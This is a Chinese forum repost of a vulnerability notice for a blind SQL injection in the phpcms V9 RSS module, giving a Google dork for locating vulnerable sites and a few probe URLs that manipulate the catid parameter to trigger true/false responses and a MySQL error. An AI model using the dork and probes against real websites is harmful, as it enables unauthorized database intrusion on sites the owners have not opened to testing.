微信公众号添加方式：
1:搜索微信号（888888）
2:扫描左侧二维码

phpcms V9 BLind SQL 注入漏洞0day

发布者: 酸菜鱼 | 发布时间: 2025-6-28 23:20| 查看数: 96| 评论数: 0|帖子模式

　　影响版本：phpcms v9 blind
　　官方网站：http://www.phpcms.cn
　　漏洞类型：SQL注入
　　漏洞描述：phpcms v9 blind 参数过滤存在SQL注入漏洞。
　　google dork:inurl:"index.php?m=content+c=rss+catid=10"
　　exploit & p0c
　　[!] index.php?m=content&c=rss&catid=[valid catid]
　　Example p0c
　　[!] http://host/index.php?m=content&c=rss&catid=10 <= True
　　[!] http://host/index.php?m=content&c=rss&catid=-10 <= False
　　[+] http://host/index.php?m=content&c=rss&catid=5 <= show MySQL Error (table)

来源：https://www.jb51.net/hack/34727.html
免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！

phpcms V9 BLind SQL 注入漏洞0day

最新评论

新人须知

常见问题

维权申诉

关注微博

扫描微信

关于合作

通讯联系